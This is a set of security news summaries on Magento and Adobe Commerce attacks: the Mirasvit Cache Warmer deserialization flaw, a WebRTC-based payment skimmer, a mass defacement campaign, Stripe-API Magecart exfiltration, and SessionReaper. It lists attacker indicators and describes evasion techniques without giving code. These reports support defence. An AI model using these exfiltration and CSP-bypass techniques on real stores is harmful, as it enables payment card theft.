Critical Magento Extension Vulnerability Exposes Thousands of Stores to RCE Attacks A severe security flaw in the Mirasvit Cache Warmer plugin for Magento and Adobe Commerce is leaving thousands of online stores vulnerable to remote code execution (RCE) attacks. Tracked as CVE-2026-45247 with a CVSS score of 9.8, the vulnerability allows unauthenticated attackers to execute arbitrary code on affected servers by exploiting improper input handling in the plugin’s caching mechanism. The flaw stems from the plugin’s use of PHP’s `unserialize()` function on user-controlled CacheWarmer cookies, enabling PHP object injection (CWE-502). Since the plugin does not restrict class instantiation during deserialization, attackers can craft malicious payloads to escalate the attack into full RCE, particularly when combined with existing gadget chains in Magento or its dependencies. Key Details: - Affected Software: Mirasvit Cache Warmer (all versions prior to 1.11.12). - Discovery & Disclosure: Identified by Sansec on April 24, 2026, with Mirasvit notified on May 21 and a patch (v1.11.12) released on May 25. - Scope: Sansec estimates at least 6,000 Magento stores are running vulnerable versions, though the actual number may be higher due to CDN masking. - Exploitation Footprint: Malicious requests contain a CacheWarmer cookie with base64-encoded serialized data, often starting with prefixes like Tz, Qz, or YT. Impact & Response: The vulnerability is easily exploitable at scale, with no authentication required. Sansec’s Shield protection blocked attacks for its customers as early as April 24. While Mirasvit has released a patch, security experts warn that exploitation activity is expected to rise following public disclosure. Administrators are advised to upgrade to v1.11.12 immediately or deploy a web application firewall (WAF) as a temporary mitigation. Compromise assessments, including scans for webshells and unauthorized PHP files in the pub/ directory, are recommended to detect potential breaches.

New WebRTC-Based Payment Skimmer Bypasses Security Controls in Major E-Commerce Attack Cybersecurity researchers at Sansec have uncovered a sophisticated payment skimmer that leverages WebRTC data channels to exfiltrate stolen payment data, evading traditional security measures. Unlike conventional skimmers that rely on HTTP requests or image beacons, this malware establishes a peer-to-peer WebRTC connection to transmit payloads and stolen information, making detection significantly harder. The attack targeted an e-commerce website of a car manufacturer and exploited PolyShell, a critical vulnerability in Magento Open Source and Adobe Commerce. The flaw allows unauthenticated attackers to upload arbitrary executables via the REST API, enabling remote code execution. Since March 19, 2026, the vulnerability has been massively exploited, with over 50 IP addresses scanning for vulnerable stores. Sansec reports that 56.7% of all exposed stores have already been compromised. The skimmer operates as a self-executing script that connects to a hard-coded IP address (202.181.177[.]177) over UDP port 3479 using WebRTC. Once connected, it retrieves malicious JavaScript code, injecting it into the webpage to steal payment details. The use of DTLS-encrypted UDP traffic rather than HTTP allows the attack to bypass Content Security Policy (CSP) restrictions, rendering many network security tools ineffective. Adobe released a beta patch (version 2.4.9-beta1) on March 10, 2026, but the fix has yet to reach production versions. While mitigations include blocking access to the *pub/media/custom_options/* directory and scanning for web shells, the attack highlights a growing trend of skimmers exploiting non-HTTP protocols to evade detection.

Massive Magento Cyberattack Compromises 7,500+ E-Commerce Sites Since February 2026 A large-scale cyberattack campaign has compromised over 7,500 Magento-powered e-commerce websites since late February 2026, with attackers uploading malicious files to publicly accessible web directories across 15,000+ hostnames. The campaign, tracked by Netcraft researchers, marks one of the most extensive Magento-focused attacks in recent years, affecting businesses, government agencies, universities, and non-profits worldwide. ### Scope and Impact The attack exploited a file upload vulnerability in Magento environments, allowing threat actors to deposit unauthorized files without authentication. Victims include high-profile brands such as Toyota, Fiat, Citroën, Asus, Diesel, Fila, Bandai, FedEx, BenQ, Yamaha, and Lindt, as well as government and university domains in Latin America and Qatar. Several Trump Organization-affiliated sites including trumpstore.com, trumphotels.com, and booktrump.com were also compromised, though researchers confirmed these were incidental targets in an indiscriminate sweep. Most defacements occurred on subdomains, staging environments, or regional storefronts, with only a few live customer-facing sites briefly impacted before remediation. Attackers left behind text files displaying aliases L4663R666H05T, Simsimi, Brokenpipe, and Typical Idiot Security alongside "greetz" messages, a common practice in defacement circles. A subset of defacements on March 7, 2026, included geopolitical messaging, though analysts determined this was not the campaign’s primary motive. ### Technical Details The attack leveraged an unauthenticated file upload flaw in Magento, enabling attackers to write files directly to web servers without credentials. Netcraft researchers successfully replicated the behavior on a Magento Community 2.4.9-beta1 test instance, demonstrating that even updated installations could remain vulnerable under certain configurations. The affected platforms include Magento Open Source, Magento Enterprise, Adobe Commerce, and Adobe Commerce with the B2B module. While Adobe released security bulletins around this period, the observed exploit does not directly align with the published fixes. The campaign shares similarities with the SessionReaper Magento vulnerability from October 2025, which also involved unauthorized file access. ### Attacker Activity and Documentation The threat actor behind the campaign, operating under the handle "Typical Idiot Security," self-reported many compromised sites to Zone-H, a public defacement archive. This suggests the attacker sought recognition within the defacement community rather than pursuing financial or political objectives. As of the latest reports, new compromised sites were still emerging, indicating the campaign remained active. Organizations running Magento-based infrastructure were urged to review file upload endpoints, apply security updates, and monitor web directories for unauthorized changes.

New Magecart Campaign Exploits Stripe API to Steal Payment Data Researchers at Sansec have uncovered a sophisticated Magecart campaign leveraging Stripe’s API infrastructure and Google Tag Manager (GTM) to steal credit card details from e-commerce checkout pages. The attack, active since at least December 24, 2025, abuses trusted domains googletagmanager.com and api.stripe.com to bypass security filters and exfiltrate stolen data undetected. The malware is embedded in legitimate-looking GTM containers, which execute when a shopper reaches a checkout page. It targets Magento/Adobe Commerce stores, capturing payment details (card number, CVV, expiration date), billing information, and customer contact data. The stolen data is obfuscated using XOR encryption, stored locally, and later exfiltrated via Stripe’s API by creating fake customer records under the attacker’s account (cus_TfFjAAZQNOYENR). A variant of the campaign uses Google Firestore (project: braintree-payment-app, document: tracking/captcha) to host the payload and store stolen data, blending in with legitimate payment and bot-protection traffic. Once exfiltrated, the malware wipes local traces to avoid detection. The attack highlights how threat actors exploit trusted platforms to evade security measures, turning payment processors into unwitting storage for stolen financial data.

Adobe is facing active exploitation attempts targeting CVE-2025-54236 (SessionReaper), a critical Improper Input Validation vulnerability in Adobe Commerce and Magento Open Source. The flaw allows attackers to take over customer accounts and, in certain configurations (e.g., file-based session storage), achieve unauthenticated remote code execution (RCE). Over 250 exploitation attempts were blocked in a single day, with expectations of mass exploitation within 48 hours due to publicly available exploit details.Only 38% of Magento stores have applied the patch, leaving a vast majority exposed. Attackers are deploying PHP webshells and phpinfo probes, indicating reconnaissance for deeper compromise. The vulnerability affects multiple versions of Adobe Commerce, Magento Open Source, and B2B editions. While Adobe released a hotfix on September 9, 2025, the leak of technical details a week prior accelerated attacker activity. Sansec researchers warn of automated scanning tools emerging rapidly, increasing the risk of large-scale breaches. Administrators are urged to patch immediately and scan for signs of intrusion, as delayed action could lead to widespread account takeovers, data theft, or financial fraud through compromised e-commerce platforms.

Hackers are actively exploiting CVE-2025-54236 (SessionReaper), a critical improper input validation vulnerability in Adobe Commerce (formerly Magento). The flaw allows attackers to take over customer accounts via the Commerce REST API without user interaction, potentially leading to unauthorized access to sensitive customer data, financial fraud, or full account compromise.Over 250 exploitation attempts were blocked in a single day, with 62% of Magento stores remaining unpatched and vulnerable. Attackers are deploying PHP webshells and reconnaissance probes (phpinfo) to assess system configurations, escalating the risk of large-scale data breaches or financial theft. The vulnerability affects multiple versions, including 2.4.9-alpha2, 2.4.8-p2, and earlier, with default configurations (file-based session storage) being the primary attack vector.Adobe issued an emergency patch, but slow adoption—only 40% of stores patched after six weeks—exposes thousands of e-commerce platforms to account takeovers, payment fraud, and reputational damage. Security firms warn of increased attack volumes following public technical analyses, urging immediate patching to prevent widespread customer data compromise and operational disruptions.

Adobe has disclosed a critical vulnerability (CVE-2025-54236, dubbed *SessionReaper*) in its Commerce and Magento Open Source platforms, allowing unauthenticated attackers to bypass security features and hijack customer accounts via the Commerce REST API. Though no active exploitation has been observed yet, a leaked hotfix may accelerate threat actor development of exploits. The flaw, deemed one of the most severe in Magento’s history, enables session forging, privilege escalation, and potential code execution—mirroring past high-impact vulnerabilities like CosmicSting and Shoplift.Adobe released an emergency patch on September 9, 2025, urging immediate deployment, as delayed action leaves systems exposed to automated, large-scale attacks. Cloud-based Adobe Commerce users received temporary protection via a WAF rule, but on-premise and unpatched instances remain at risk. The vulnerability’s exploitation relies on default session storage configurations, increasing its reach. Failure to patch could lead to widespread account takeovers, financial fraud, and operational disruptions for e-commerce businesses, with Adobe offering limited remediation support post-breach.Researchers warn of high automation potential, emphasizing the urgency for administrators to test and apply fixes despite potential compatibility issues with custom code.

Threat actors are actively exploiting CVE-2025-54236 (CVSS 9.1), a critical improper input validation vulnerability in Adobe Commerce and Magento Open Source, enabling account takeovers via the Commerce REST API. Over 250 attack attempts were recorded in 24 hours, with 62% of Magento stores remaining unpatched six weeks post-disclosure. Exploits involve dropping PHP webshells and extracting PHP configuration data via fake sessions, risking full customer account compromise. The flaw, dubbed SessionReaper, follows a similar 2024 deserialization vulnerability (CosmicSting, CVE-2024-34102), highlighting a pattern of high-severity exploits in Adobe’s e-commerce platforms. Public proof-of-concept (PoC) exploits and technical analyses (e.g., by Searchlight Cyber) accelerate attack adoption. Adobe confirmed in-the-wild exploitation, urging immediate patching to prevent widespread account hijacking, data theft, or backend system infiltration—potentially disrupting payment processes, customer trust, and operational integrity for affected stores.